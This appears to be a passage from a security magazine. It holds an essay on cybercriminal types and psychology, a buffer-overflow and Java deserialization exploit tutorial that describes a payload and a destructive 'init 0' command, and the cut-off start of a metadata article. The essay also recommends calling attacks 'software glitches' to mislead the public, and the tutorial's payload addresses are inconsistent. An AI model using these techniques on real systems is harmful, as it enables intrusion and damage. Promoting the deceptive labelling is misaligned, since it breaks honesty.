• The computer or network is used as an instrument of the crime, e.g. the criminal activity cannot be
undertaken without the computer or network being switched on and in use, such as when initiating a Denial of
Service (DoS) attack.
• The computer or network is the target or focus of the crime, e.g. an attempt to hack a server to steal
data has that server as the target, even though a computer or network is also often used as an instrument for
the attack; but if an attacker gains physical access to the server and steals the unencrypted drives then the dis-
tinction is clearer.
• The computer is an evidence repository, e.g. the evidence can be found on the computer when electronic
documents containing stolen intellectual property are stored on a drive on the system.
The criminal act itself may include only one of these, or may involve all three.
A variation on all of the above is cyber terrorism, a distinct type of terrorism building on the above crimes. The aim of
terrorism is not to cause personal physical, infrastructure, or economic harm, but to do just enough to scare the public
into thinking these are possible; and cyber terrorism is terrorism that uses the first two categories of the above crime
categories, where the computer is the instrument of the crime or the target.
When a cyber crime is committed it often includes a number of the individual crime categories or is a prelude to an-
other type of crime. Cyber crimes can be broken down into the following types:
• “Hacking”/“Cracking” – Whilst known commonly as “hacking”, this term used to be related to modifying the
usage of something technical to achieve an unintended purpose, and the term “cracking” is probably more accu-
rate. Hacking is essentially the unlawful access of another person, organization or company’s com-
puter without the permission of the owning entity. Whilst the purpose of the “hack” may be investiga-
tive in finding security flaws or for an individual to prove their abilities, it is still a crime. However, in most
Understanding CyberCrime and CyberCriminals
cases the professional criminal hack is for later exploitation for fraud, stealing of data using malware, or to per-
form damage to a system’s operation, such as with a denial of service attack or use of a virus to cripple sys-
• Identity Theft – As the name would imply, this is the stealing and use of a person’s identity informa-
tion, often including credit, address, tax, and banking details for fraudulent purposes or to masquerade as that
person. Note that the stealing of the identity is a crime, but the intent is often for the purpose of theft or crimi-
nal damage of some form.
• Internet Fraud – Fraud is the wrongful or criminal deception intended to result in financial or
personal gain; so in this case, the deception uses the Internet, its facilities, and entities with a
presence on the Internet for that fraud. This is a large subject area that is best explained with examples,
such as criminals using stolen banking credentials to steal funds, online auctioneers taking payment for prod-
ucts they never send, or email scams offering to transfer large funds without doing so in return for a smaller in-
vestment. In these cases the fraud is a crime in its own right, but the use of the computer and Internet adds a
dimension that makes it harder to track and prosecute.
• Intellectual Property Theft / Digital Piracy / Copyright Infringement– The definition of Intellectual
Property refers to a creation of the intellect to which a monopoly of ownership and usage is as-
signed by law; with examples ranging from music and books, to patents and company strategy
secrets and information; so copying and stealing it is intellectual property theft and distribut-
ing it is digital piracy. This is a crime that so many consider is “victimless”, neglecting the loss of earnings to
the creator, so download copyrighted music and movies from the Internet is a crime committed by a large num-
ber of people; but the theft of engineering designs and company strategy is big risk to the economy and com-
pany earnings.
• Cyber Squatting - Officially this is registering, trafficking in, or using an internet domain name as-
sociated with a trademark of another entity with bad faith or intent to profit from it. Often this is
related to fraud in that the perpetrator tries to profit from selling the domain name back to the copyright
owner, so in this case, the crime is variation on both intellectual property theft and fraud.
• Online Harassment / Cyber Bullying / Cyber Stalking / Surveillance and Snooping – This crime
exists in variations that include the uninvited or unwanted following of an individual’s online, social
media, or email presence for the purposes of bullying, harassing or scaring them. Some posting of
bullying messages or unwanted sharing of private images retrieved from hacked emails have resulted in sui-
cides, and even if the outcome is not this or legal action from the attacked individual, the misuse of computers
for this purpose is a crime.
• Child Digital Pornography – This is the taking, distribution and downloading of illicit, abusive,
non-consensual images of minors; exploiting the age old crime of abuse of children and bringing it into
Understanding CyberCrime and CyberCriminals
the digital age where images can be easily shared electronically. This is the largest section of the cyber crime
range in terms of prosecutions, but is especially difficult to prosecute as the legal ages relating to minors differ
in different parts of the world.
• Electronic Bodily Harm or Murder – This is the use of a computer or electronic device (e.g. a ro-
bot, phone, household device) to commit an act harmful or fatal to an individual. Whilst there are
debates as to the extent of such attacks, they are definitely possible. In the 1980s it was possible to change the
criteria of a cathode ray tube (CRT) monitor electronically to cause it to implode; and more recently, aircraft,
cars, and air traffic control systems have all been attacked or had “software glitches” that have resulted in poten-
tial or actual harm or death. In 2015, a malfunctioning robot crushed the skull of a worker in Michigan. As soft-
ware malfunctions can cause harm, and there is evidence that some “hacking” of such devices has been at-
tempted; the possibility of harm or murder deliberately caused is ever more likely.
The aim of responding to any of these crimes is to achieve a successful prosecution and produce future mitigations to
reduce the likelihood; either through security controls or through appropriate punishments through the legal system
so as to make committing the crime unattractive in comparison to any benefits or pleasure the criminal may derive. To
achieve successful prosecution through the legal system, evidence must be captured in line with appropriate forensic
and “chain of custody” requirements in such a way that there is no doubt as to the identity of the criminal and the ex-
tent of the crime.
The keys to understanding the cyber criminal are the tools used, the skill of the attacker, and the motivation behind
the attack. This splits the set of attackers into different “actors” with associated motivations and behaviours that dic-
tate the threats each presents and also how they can be thwarted.
• Hackers – These split into three categories depending on motivation. True hackers are highly skilled individu-
als who perform reconnaissance to probe the “attack surface” of a company or system to gain an understand-
ing and look for vulnerabilities to exploit. They then use tools or home written code to attack those vulnerabili-
ties and make their way into the system. Once inside the system is “pwned” and they usually leave a back door
for “command and control” to allow them easier future entry to the system.
• White Hats - Those who perform these steps to understand the system and then report the vulnerability,
and maybe provide fixes or workarounds, are called “white hats”; they may do this as their career or job
as “penetration testers”.
• Black Hats - Some “hack” for malicious reasons to damage systems, or to commit fraud or some other
act for financial gain; these are called “black hats”.
• Gray Hats - The third category, “gray hats”, are a mix of the two categories and sometimes find vulner-
abilities so they can sell services to fix them, although in many ways a gray hat is someone who sometimes
Understanding CyberCrime and CyberCriminals
acts in the role of a black hat and sometimes in the role of a white hat. The motivation of a hacker usually
starts out as an attempt to understand systems and prove their abilities, but at some point, the need to
earn money from these skills directs the individual to one of the black or white hat roles depending on an
internal moral code.
• “Script Kiddies” – These are less skilled than true hackers, but ultimately have the same effect, albeit usually
in a less targeted manner due to the lesser skills and understanding. They search the internet for tools to use to
attack systems, often on the dark web or dark net that is not searchable using legitimate search engines, and
then set them loose on individuals or legitimate organization or company web sites without understanding how
they work or what effect they have at the detail level. The lack of understanding and skills with such powerful
tools makes this category particularly dangerous - an analogy would be giving a chainsaw to a child to prune a
flower from a plant - yet they use these tools widely and regularly rather than the targeted and methodical ap-
proach of the true hacker.
• “Hacktivists” – These are black hat hackers with a particular motivation, that of making a political statement;
usually this gives a moral direction to restrict actions to those of a social activist and performing defacing of
web sites of companies or organizations with opposing views or performing a denial or service attack to restrict
their operation. Extreme cases of “hacktivism” can be classed as cyber terrorism, particularly if the denial of
service is on government, major corporations with large economic effects, or critical infrastructure operations.
• Cyber terrorists – This is also a category of black hat hacker with a particular motivation; that of striking
fear or terror into the public consciousness. Usually a cyber terrorist, who is also an extreme type of hacktivist,
will attack government, critical infrastructure, or major economic interests of a nation to cause fear of actual
harm or economic harm. Special cases of critical infrastructure attacks are threats to aircraft and related criti-
cal infrastructure, or cars, as the threat of harm and death now equals that of traditional terrorism.
• Organised Crime – This type of black hat hacker is simple to understand, and consists of a group of individu-
als working together illicitly for financial gain, with some aspect of the crime being electronic. This may include
fraudulent attacks, but often will focus on identity theft to facilitate other criminal activity such as money laun-
dering, intellectual or financial theft or people trafficking. A company sponsoring a hacker to steal secrets from
another competing company is taking the role of organised crime.
• Nation State / Cyber Warriors – In some ways this is not a criminal, per se, but undertakes criminal activ-
ity from the perspective of one nation over another. These black hats attack companies, government, defence,
or critical infrastructure of other countries under the sponsorship of one nation with an aim of stealing secrets,
or causing physical or economic hardship in the target nation. Companies attacked by nation states are usually
those with specific highly important secrets, such as aircraft designs, or those with a particular level of impor-
tance in the target nation (e.g. the largest bank). An attack typifying this category is that of the “Stuxnet” mal-
ware believed to be the product of the US and Israel that specifically rendered the nuclear uranium centrifuges
of Iran unstable and damaged the Iranian nuclear weapons program after delivery via an infected USB drive. It
Understanding CyberCrime and CyberCriminals
is believed that these “cyber skirmishes” are a prelude to the future of war, a “cyber war”, when nation states
will attack each other electronically to avoid risking the lives of soldiers required to be physically present on en-
emy territory.
Understanding the type of attacker tells us not just what skills they have, but also what they might attack and how we
might prevent the attack entirely or respond to minimise the effect. For this we need to understand the psychology.
Cyber criminal psychology is a fairly new discipline in some ways in its own right, but can be considered as a result of
trying to understand general criminal motivation coupled with the securitization techniques from international stud-
ies. Motivations can be grouped and, as a result, the responses can also be grouped.
• Political Attackers - Motivations for “hacktivists” and “cyber terrorists” are political and aimed at highlight-
ing a “cause”; reducing the highlight or damaging the cause reduces their motivation.
• Non-fraud related hacking and script kiddies - For “script kiddies” and non-fraud related cyber-crimes
the motivation is proving how smart the attacker is or how poor the security is; “defence in depth” and layers of
security to make the attacker work hard reduces the motivation.
• Fraud and Organised Crime - For fraud related activities and organised crime, using tokens instead of real
value or payment mechanisms, and reducing the attack surface cuts down on the motivations for fraud.
For political motivations, the political and psychology related subject of securitization from international security stud-
ies helps to understand the mind of the attacker. In securitisation, an issue or event is not considered a threat until
someone, usually a politician, radical preacher, or terrorist leader, names it as such as a means to gain more power. It’s
simply the use of language to describe something to make it appear as a threat, or conversely to reduce its appearance
as a threat. Securitisation is about language used and its relationship between the power and presence of the speaker
(“ethos”) and the appeal to the emotions of the audience by highlighting a perceived threat (“pathos”).
The technique is especially important in the fields of terrorism, and cyber terrorism, as it is the mechanism that under-
pins terrorism, radicalisation, and the appropriate counter responses. To be very clear, it is not the criminal act that
makes something terrorism, but the language used to describe it and the fear instilled as a result. This may seem outra-
geous, but let’s explain with some examples.
Consider the Airbus A400M Atlas plane crash in Seville on 9th May 2015 where four people died when the software con-
trolling three of the engines would not allow the pilots to set cruising speed due to a “glitch” caused by an engineer acci-
dentally wiping key data. It is likely that an aircraft can be “hacked” from onboard using certain exposed cables that
connect to the cockpit, but so far no crashes or deaths have been attributed to hacking. If this crash were described as
“hacking” rather than an accidentally caused “software glitch” there would be fear of flying from the general public.
Understanding CyberCrime and CyberCriminals
With physical and cyber terrorism, the aim is the same; communicate a message through disaster and danger to the
public. Recently, in London in the UK, a police officer was killed through stabbing and many injured when the attacker
ran over pedestrians in his car. This was declared as terrorism due to his stated intent, and the result was public fear of
another attack. In Australia, a similar set of circumstances in Melbourne, where the attacker driving a car into pedestri-
ans was declared as mentally ill did not result in wider public fear. Not wanting to take away anything from the inci-
dents, I know people involved and suffering, the difference in the resulting fear was the language used to describe the
Similar events where air traffic control systems in various countries were disabled through human induced “failures”,
the use of the term “hack” over “software glitch” completely changed the public perception and the resulting response
from the public.
The same can be intentionally done to reduce fear. When the US-led coalition sent planes into the Middle East to at-
tack ISIS bases, the wording and gestures used by the leaders differed greatly, and as a result, so did the public percep-
tions. The approach used by most leaders was to issue a very grave statement that ISIS posed a threat in many coun-
tries so aircraft were being used to attack their command and control infrastructure; the grave statement relating the
attacks to potential local terrorism resulted in fear. The approach by the Australian leader at the time, Tony Abbott,
was a masterful use of securitization techniques with psychology in word and mannerism usage to reduce fear; as he
waved his arms around as if stating something that wasn’t important enough to be at the forefront of his memory and
said the planes were needed to deal with that “er, Daesh death cult”, not even giving them the title they used for them-
Terrorism is not about causing damage or death, but about communicating a political message, usually one of fear. Se-
curitisation turns a criminal act into a terrorist one or a threat to survival of a target group, and takes a political issue
and makes it a security issue, or more specifically a terrorist one. This is how radicalization works, in that a security
actor, i.e. a terrorist leader or radical preacher, is given the power of the audience as the leader to enable him or her to
act. The language and speech is the “locutionary act” which relates to “lagos”, the position of the speaker, the “illocu-
tionary act” or “ethos”, and the targeted feelings of the audience is the “perlocutionary act” or “pathos”. The process
relates the message, the sender, the message generator, and the receiver.
“Essentially, the very thing that separates terrorist violence from ordinary criminal violence – and thus makes it terror-
ism – is that the act is instilled with political or politico-religious meaning. It is the message that makes terrorism.
There is a sender (the terrorist), a message generator (the victim), and a receiver (the public).” (J. Staun, 2010).
This may not seem that important or even relevant, but the language we use to describe an incident or attack greatly
affects the perception of success in the eyes of the attacker. If we refer to an attack by a “hacktivist” or “cyber terrorist”
as a “software glitch” with no further details, given their political motivation to highlight a cause, their success and re-
lated power to highlight that cause are removed too. If the cause isn’t highlighted then there is no benefit to the at-
tacker to mount future attacks, thus reducing the future threat.
Understanding CyberCrime and CyberCriminals
Cyber Criminology
For other types of attacks, psychological research has been undertaken, derived from physical world criminology re-
search theories. These are covered in journals and books on cyber crime and cyber criminology in depth, along with
wider theories in computer use in the field of cyber psychology.
This general theory of criminal behaviour postulates that criminals often have low self-control so seek immediate grati-
fication in terms of excitement and financial gain, even ignoring any negative long-term effects in terms of career and
future punishment. This behaviour is associated with parental relationships during upbringing. “Script-kiddies” are
believed to be particularly susceptible to this seeking of short-term gratification, so making an attack harder and more
of a time investment is a demotivator – a strong argument for defence in depth.
Labeling Theory
This simple theory says that if an individual is labeled in a negative light as evil or a criminal then their behaviour will
tend to follow that pattern due to self-belief or a difficulty escaping the effects of that labeling. This can be seen particu-
larly in the area of sex crimes, where teenagers engaging in under age sex are labeled as sex offenders and put on a reg-
ister which then often leads them into more deviant sexual behaviour, which may include downloading child pornogra-
phy and cyber stalking. Children labeled as anti-social with technical skills may get labeled as “hackers” and then due
to self-belief and a desire to prove themselves may lead to trying to live up to the label. The moral of this theory is to
avoid labeling individuals wherever possible and focus on labeling the acts themselves with care.
Deindividuation Theory
This is a scientific representation of the standard parenting excuse of “falling in with a bad crowd”, emphasising the
crowd, where people taking part in group activities lose a sense of self-identity and “follow the crowd”. This was evi-
denced in the famous Stanford experiment; students were assigned to take on the role of prison guard and prisoner
and took on more aggressive behaviour associated with the group identity until the experiment had to be stopped due
to safety fears. There is an assumption of anonymity on the Internet and if publicity glorifies certain behaviour, indi-
viduals will most likely follow suit if they think they won’t get caught, as is the case with “hactivists” and “script-
kiddies”. Research has shown that people are more likely to go further online than they would in face-to-face confronta-
tions, as seen in cyber bullying and trolling. There is a suggestion that showing that the user identity information on a
page, such as with messages of “User ID” and “IP Address” may deter criminal activity as it identifies the individual
who would otherwise be encouraged through their belief in anonymity. Similarly, messages relating to authorised use
policies can demotivate a potential attack.
This theory has particular effect on the implementation of security controls. It works from the basis that criminals are
making rational decisions when they seek to commit a crime, expecting to get some benefit from it and not get caught.
Understanding CyberCrime and CyberCriminals
A crime is believed to occur under three conditions: 1) a motivated criminal, 2) a target, and 3) the absence of a guard-
ian. This is best explained in physical terms as relating to a burglary where a potential burglar sees something he
wants to steal, but will be motivated by the absence of a burglar alarm, which is why less affluent areas without burglar
alarms are more often targeted. In cyber security terms, the presence of anti-virus and anti-malware technologies will
demotivate a criminal from a particular target due to the possibility it may alert or protect from an attack, even if the
defences would not detect or respond to the attack in question. Therefore, the appearance of defence in depth and a
number of defences, along with acceptable use messages and details of security and prosecution threats, coupled with
user details that remove anonymity (e.g. IP address), can take the guardian position and prevent an attack.
This is another scientific representation of the parenting excuse of “falling in with a bad crowd”, emphasising the learn-
ing of bad behaviour from individuals in the group rather than losing individuality in the direction of the group as a
whole. So, in principle, if individuals associate with criminals, they will learn criminal behaviour and become criminals
themselves. On the web, users who frequent hacker web sites or radicalization web sites will start out with some moti-
vation or interest taking them to the sites in the first place, but will take on more criminal behaviour as they learn
hacker activities. Initial interest in such communities may develop into excusing activities, e.g. that software piracy
isn’t really a crime or child pornography doesn’t develop into child abuse (although it has been proven to be used in
“grooming”), and then the next step is to fully participate. Associating with hackers online or offline influences develop-
ing hackers, so reducing the access to the sites themselves and reducing publicity of the communities, will have the ef-
fect of reducing criminal activities, and publicising the criminal nature of the activities and negative effects of prosecu-
tion on future careers also gives a major disincentive.
This general theory of criminology considers how an individual rationalises the move from law abiding to criminal be-
haviour without guilt through the process of “drift” via one or more of five techniques:
a) Denial of injury – in this the act is assumed to not “cause any real harm”
b) Denial of victim – in this the act is assumed to not “hurt any actual individuals”
c) Denial of responsibility – in this the perpetrator claims that “circumstances” made them do it so they couldn’t
help themselves
d) Condemnation of the condemners – this is where a perpetrator accuses the accusers of “committing a worse
crime themselves” or the same crime in similar circumstances
e) Appeal to higher loyalties – in this the perpetrator argues that the values of society aren’t right and that his or
her own values are more important
Understanding CyberCrime and CyberCriminals
It can be seen how these rationalizations have been used to justify cyber criminal behaviour; neutralization if it is be-
fore the criminal act is committed and rationalization if it is after the act. It can be seen that a), b) and d) are often
used in hactivism on banks and government sites or digital piracy. For cyber terrorism, d) and e) are often used to jus-
tify the act. With organised crime, the argument for c) is sometimes used. To overcome the rationalizations, some suc-
cess has been seen in tying the act to actual victims, such as in advertising on DVDs to show how piracy has cost jobs
for less visible jobs in film making, or how less well paid jobs have been lost as a result of hactivism. Publicising job
losses after the events of cyber crime or how attacks on the government results in less investment on health care or
schools can show the effects of cyber crime; this coupled with law abiding peer pressure should have an effect on reduc-
ing the self-justification for future criminal acts.
This is a theory specifically formulated for cyber crime, showing that people behave differently in cyberspace to physi-
cal space; as a result those who would not commit a physical space crime are more likely to commit crimes in cyber
space. Social media has shown that people are more likely to use confrontational language online that they wouldn’t
use in face-to-face meetings. Similarly, whilst digital piracy is common, most common perpetrators would not physi-
cally steal a wallet or take items without paying from a shop. One of the major beliefs behind this behaviour is believed
to be due to the perceived anonymity in online actions, but there are seven components and beliefs underlying the the-
ory that explain the behaviour:
A) Some people have criminal tendencies, but fear of getting caught and losing social status stops them commit-
ting the crime in “physical” space, but the lack of human observers in cyberspace reduces that risk so they
give in to their tendencies.
B) Perceived anonymity of an online identity coupled with the difficulty of prosecution of online cross-
jurisdictional crimes reduces the fear of being caught.
C) Criminals from physical space are moving into cyberspace due to the lower risks of being caught, and success-
ful criminals in cyberspace who aren’t caught may feel encouraged to take risks in physical space and commit
physical space crimes.
D) Those with repressed behaviour and beliefs due to the closed nature of the society or situation in which they
live may feel freer to express themselves, their beliefs, and criminal motivations in cyberspace where the
physical repressive controls aren’t there to dissuade them.
E) The global nature of cyberspace leads to a mix of people with different cultural norms and a tendency to stan-
dardise on common “online values”, which may take the form of a “lowest common denominator” view of le-
gality and criminal behaviour to increase the likelihood of cybercrimes.
Understanding CyberCrime and CyberCriminals
F) The global nature of cyberspace allows criminal behaviour to occur from anywhere in the world and then
make an escape, and entry into and out of cyberspace can occur at any time, so chances of being caught are
less than in physical space.
G) The social nature of cyberspace (e.g. social media, email, forums, etc.) allows strangers to collaborate on com-
mitting crimes in physical space, and conversely those who know each other in physical space can collude to
commit crimes in cyberspace.
Whatever the reason or combination of reasons motivating cybercriminal behaviour, the response to protect against
the behaviour beyond physical controls is to ensure the potential criminal fears loss of anonymity (e.g. show messages
showing IP address, geolocation, etc.) and is aware of the nature of any potential crime and a desire to prosecute; a po-
tential criminal who believes they can be identified and forensic information has been captured will be less motivated
due to fear of being caught.
Essentially, the psychology underpinning all of the theories of the above tells us that defence in depth provides real pro-
tection for data and processes, and also provides a deterrent; but understanding the motivations and fears of a poten-
tial cyber criminal and responding accordingly can also reduce the risk of crimes occurring. Ultimately, the hardened
attacker from an organised crime gang will still likely try to commit the crime, but is just as likely to use physical com-
ponents of an attack and the crime may relate to wider physical criminal behaviours (e.g. human trafficking). Reduc-
ing the attacks to the hardened criminal does allow more focus to be given to the real crimes due to the reduction in
events to monitor and respond to.
One key-learning from this that has a particular technical impact where controls are currently lacking is the effect of
the perceived belief in anonymity. Developing and deploying the technology to detect use of anonymising proxies and
overcome them to detect the real potential criminal should give a means to reduce attacks from all but determined or-
ganised crime perpetrators. The foundations do exist in idea form; with blacklists, code that detects the behaviour of
utilities like TOR, and callback communications. See the SANS paper in the references.
One of the problems with the above is that it really applies to the external attacker; and not the disgruntled employee
or those who breach physical security to get inside the company perimeter. In reality, as companies tend to strengthen
their perimeters and have weaker protections within their company buildings on their internal network, the greater
risk is from internal attack.
Understanding CyberCrime and CyberCriminals
A “hacktivist” or cyber terrorist commits crimes such as defacing web sites, Denial of Service (DoS), or critical infra-
structure attacks to get publicity. Without the publicity, the attacks don’t achieve the aims of the attacker so there is no
benefit and motivation for future attacks. The threat is, therefore, reduced if there is no publicity from earlier attacks.
Other attackers have motivations that are financial or for prestige, and the two main demotivators are fear of being
caught or exposed, and the effort involved in the attack itself. Defence in depth and techniques to identify the real user
act as a warning to avoid an attack. If the types of defences are well known, it may act as a challenge for some hackers,
but the less motivated will avoid an attack.
The two key threats of organised crime, and disgruntled or tempted employees, are not dissuaded by the defence in
depth or external security controls, but the other attackers will move their efforts to other targets. This allows more fo-
cus on evidence collection for prosecution of the criminal activity that still occurs once it has been detected.
If attackers see that a company prosecutes cyber attackers to the full extent of the law, and that they keep logs suitable
for “chain of custody” forensic support to facilitate that prosecution, even hardened criminal attackers will think twice.
Web logs and audit logs need to be captured and the details turned up when a potential fraud or attack is detected;
with these copied securely offsite with source metadata, a date and time stamp, and a hash of information to avoid tam-
pering with audit on access to that data.
To provide a real deterrence to an attacker, there must be a response to any attack. This should include prosecution for
criminal attacks, and minimal information beyond acknowledging an outage (if one occurred) for politically motivated
attacks. Whichever response is appropriate, enough information should be captured to patch any vulnerabilities that
have been identified and to support prosecution.
Most attackers will perform some sort of reconnaissance, and this can often be identified even if it isn’t an attack itself.
Rules engines in the flow of transactions and analysis systems feeding these with threat value assessments can help in
data collection and response. For example, a small number of legitimate low value business transactions may be identi-
fied outside of security systems, and this should lift the threat level allowing the rules engines to switch on more log-
ging for a particular inbound channel or session. An unauthorised vulnerability scan should further raise the threat
level, and at this point the attack can be considered as having started to slow down the session in the rules engine and
forensically collect further logging information whilst leaving other sessions unaffected. Once a hack, script or use of
tools such as known Metaspolit plugins are detected, the forensic information should be made ready for prosecution
and attempts made to adapt to or terminate the sessions; at this point the use of honeypots can be part of the response
to enable prosecution.
Remember that attacks can be internal as well as external, so this behaviour need not be only seen on external bounda-
ries. Adaptability in the transaction processing coupled with background analysis of behaviour is the way to prepare
Understanding CyberCrime and CyberCriminals
for and respond to attackers, with an understanding of the types of attack motivations giving guidance as to how to re-
spond after the event.
• To respond to all of the attack vectors requires understanding the types of attack and attacker along with the
motivations; this gives us guidance for how to respond and mitigate the attacks:
• Do not refer to an attack as a “hack” and do not publicise hactivism or cyber terrorism. Use language such as
“software glitch” to deflect attention from cyber terrorism and hacktivism attacks.
• Use proxy blacklists and detection, and callback technologies, to identify users trying to remain anonymous
and either drop the connection or display user identification messages.
• Have layers of defence in depth security at the perimeter to slow down motivated attackers.
• Keep forensically secure logging and audit information in a controlled manner compatible with “chain of cus-
tody” processes to facilitate prosecution.
Responding to threats with these mitigations will not completely remove attacks, but attacks should be reduced.
Understanding different types of attacker and their motivations can give a different set of mitigations to those cur-
rently used as a blanket defence by companies. Hacktivists and cyber terrorists can be diverted by using language that
does not highlight their message; care must be taken to refer to “glitches” rather than hacks. Many attackers assume
anonymity on the Internet so displaying status information as to their source IP address or removing access via ano-
nymizing proxies will discourage them for fear they will get caught and prosecuted. Defence in depth is the only real
protection from the motivated attacker from an organized crime background, but knowing that attackers are success-
fully prosecuted due to forensically sound audit and logging controls will provide some discouragement.
• Staun, J. (2010), When, how and why elites frame terrorists: a Wittgensteinian analysis of terror
and radicalization, Danish Institute of International Studies, Copenhagen, Denmark
• Moore R. (2010), Cybercrime: Investigating High-Technology Computer Crime, 2nd Edition, Rout-
ledge Press.
Programming for Hackers
by Amit Ranjan
Working for Aujas Networks for the last 8+ years and harnessing their plat-
Awareness of various elements in a programming language provides more sharpness to the hacking techniques, such
as elements that form the surface for interaction with the outside world users, elements that talk to the underlying op-
erating system, such as system calls, elements that connect to other resources, such as database or network streams,
etc. In this article, I will try my best to take you through the segments of some programming languages that have long
been exploited to disrupt the security of an implementation.
What is common in ‘Morris worm’, ‘Code Red Worm’, ‘SQL Slammer Worm’ or ‘Heartbleed’ and few more successful
prominent attacks, is that they are all variants of buffer overflow attacks.
Originally created to calculate the size of internet, Morris worm was written by Robert Tappan Morris that exploited
buffer overflow vulnerability in a ‘fingered’ program to launch a shell that can receive and execute instructions over an
open network connection from the attacker.
The worm that even affected the web server at ‘White House’ for a very short duration, exploited buffer overflow vul-
nerability in Microsoft’s IIS web server by using a long string with repeated letter ‘N’, and the payload to deface web-
sites was observed on the internet on July 15 2001, by Marc Maiffret and Ryan Permeh while they were drinking Code
Red Mountain Dew; that’s why they named it ‘Code Red Worm’.
SQL Slammer worm exploited the buffer overflow vulnerability in Microsoft SQL Server 2000 to generate random IP
addresses or broadcast addresses for propagation on a network that caused a massive amount of network traffic, which
brought down as many as 5 of 13 internet root name-servers.
The recently found ‘Heartbleed’ vulnerability in OpenSSL cryptography library was allowing an adversary read past a
buffer to get access to secrets such as cryptographic keys, credentials and other sensitive information. On May 20,
2014, 1.5% of the 800,000 most popular TLS-enabled websites were still vulnerable to ‘Heartbleed’.
Buffer overflow or buffer overrun is common in programming languages that allow reading or writing beyond the
boundary of a buffer. A buffer is the allocation of contiguous memory location to hold data, while moving control to
different sections of a program or while moving between programs. In C and C++, there is no inbuilt boundary check
when an input attempts to access a buffer. This may allow an attacker to craft a payload that can read or write past the
buffer to adjacent memory locations. What can be achieved by that depends upon what exists beyond the buffer.
Vulnerable Code:
A vulnerable program
As you can see, this code is not practical by any stretch of the imagination, why would someone try to read from the
file? But just to convince you that the function etc_passwd() is dangerous, this example is useful. As a hacker, our
goal will be to invoke the ‘dangerous’ function to steal the sensitive information.
Environment details:
Below are some noteworthy details about the environment to recreate this example:
IDE: Eclipse IDE for C/C++ Developers Version: Neon.3 Release (4.6.3) Build id: 20170314-1500
The Fundamentals:
A detailed understanding of the memory layout is the key for a successful buffer overflow exploit; that includes how a
program is laid out in the memory, where and how is the data stored while processing, how are different registers used
to keep different locations of the program for managing the flow and how to generate a payload.
Memory Layout
Memory layout for the binary
Below is another simple program for better understanding that you should never show “Authenticated” irrespective of
whatever input is provided.
Let’s create a binary from the above code and attach ‘gdb’ debugger to the process after executing it and set a break-
point at line no. 13. We can get low level details, such as addresses of variables and their values, while the program is
gdb’ debugger attached to the process
We can press ‘s’ or ‘n’ to move forward one line at a time. We can also view the address or the value of a variable that is
pushed on the stack. In this particular instance, we will try to understand the memory layout of the binary. After pro-
viding an input string and pressing ‘s’ multiple times, we can inspect the addresses used in the program.
A function along with its variable gets pushed on the stack as the binary gets executed in the memory. In this case,
‘auth’ and ‘credentials’ are pushed on the stack in reverse order and subtraction of their address provides us the size of
the buffer allocated for variable ‘credentials’.
• Size of the buffer can be calculated by simple hexadecimal calculations to know how many characters are re-
quired to overflow the buffer and write a sensitive variable, which is ‘auth’ in this case, to make it non-zero.
Let’s try to get the above program to print “Authenticated” with our malicious input which probably is the simplest
hack in this universe!!!
There are some more important elements in the fundamentals that are worth understanding.
Meta-data (Registers)
The processor needs to know the address to return while making a function call, it needs to know the next instruction
to be executed and the address where the data is stored to process upon.
1. %eip is the register that contains the pointer pointing to the address of the next instruction to be executed.
2. %esp is the stack pointer register that points to the top of the stack.
3. %ebp is the base pointer register to locate local variables and function parameters. It is also called the
frame pointer and the addresses of variables are found out using the size of the variable as offset relative to
its value in case of contiguous memory allocation.
1. The value of %eip is pushed on the stack so that control can be returned back to the callee function and its
value is now set to the address of the called function so that the next instruction in the called function can
be executed.
2. The value of %ebp is pushed on the stack so that data can be located when the control returns back to the
callee function and its value is set to the %esp where the data is being pushed that will be executed upon in
the called function.
Now let’s focus on the challenge we started the discussion with, to print the content of the ‘/etc/passwd’ file through
buffer overflow vulnerability. We will take the analysis of our binary to the next level using another tool called ‘ob-
Let’s focus on some interesting details in the ‘objdump’ output. The address of the sensitive function: ‘080485cc’
The size of the memory allocated to the buffer 1c = 28 in decimal in ‘input()’ function:
With the above discussion about the memory layout and registers we know that the content of ‘%eip’ and ‘%ebp’ must
be pushed on the stack while calling the function ‘input()’ in ‘main()’ at line number 32, followed by data in the ‘in-
put()’ function. There is a buffer to hold 20 characters within ‘input()’ function. Once this gets pushed to the stack and
the execution starts at line number 20, the stack contains buffer → %ebp (frame pointer for data in ‘main()’) → %eip (in-
struction pointer) to resume in ‘main()’ where it left for executing ‘input()’ function. We need to manipulate the value
of %eip pushed on the stack so that the control goes to the ‘etc_passwd()’ function instead of returning to the ‘main()’
function. We have the address of ‘etc_passwd()’ function - ‘080485cc’.
The Payload
The payload should be such that it can consume the entire space allocated to the buffer + the size of the %ebp register
+ the new value for the %eip register (the address ‘0804856b’ in little-endian or big-endian format) = random string
of 32 characters + \x6b\x85\04\08.
Successful buffer overflow attack
The one explained above is called stack smashing. There are many variations of the buffer overflow attack that can
1. Corrupt memory allocated on the heap using malloc and new operator
4. Corrupt data
We need to understand the language construct that deals with memory buffers and insecure implementations that al-
low access beyond its boundaries while dealing with low level programming languages, such as C/C++.
Serialization Flaws:
The process of converting an object to a byte stream that can be stored in a file, saved in a database or transported as a
network stream is called serialization and the reverse is called de-serialization. There are various libraries provided by
different high level languages to de-serialize a byte stream to re-create a Java object from that. These libraries can be
exploited to execute a shell command of an attacker’s choice. Let’s try to understand this with a simple implementa-
tion found on internet to create a Java bean (class with member variables and associated getter and setter) from an
xml file.
A new file ‘hack.txt’ getting created as a result of successful exploits
It is the insecure de-serialization that gives way to a malicious xml file to execute the
‘Java.lang.Runtime.exec()’ function with “touch hack.txt” as an argument. Consider it running with “init 0” and the re-
sult will be devastating. Knowledge of programming languages will be of substantial help to a hacker for exploit devel-
opment rather than relying on fuzzing with different payloads available on internet.
The dangers of metadata
by Verónica Berenguer
The extraction of metadata is one of the biggest dangers that exist related to the files and that people ignore. Metadata
extraction will be addressed and advice will be given to avoid risks.
In this article, we will introduce the world of programming for hackers, specifically, the extraction of metadata using
Python from images or PDF documents. The topics addressed are as follows:
• No prior knowledge is required because all necessary knowledge will be explained in this article.
Nowadays, society has the need to share all its moments and moods with friends and family. This is a reality that we
can see every day in social networks like Facebook, Twitter, Instagram, Snapchat, etc. It’s so much the boom of these
applications, that new ones arise all the time with a different essence that attracts its use. However, users don’t stop to
think about the risks which they’re exposed to by an inappropriate use of them. One of the most common, especially
between young people, is to follow strangers to get reciprocal action from them and vice versa, just for the satisfaction
of having many followers. This leads you to reveal personal information without knowing their true intentions, getting
at all the data about your habits without any effort. And the worst of all is that you can reveal sensitive information
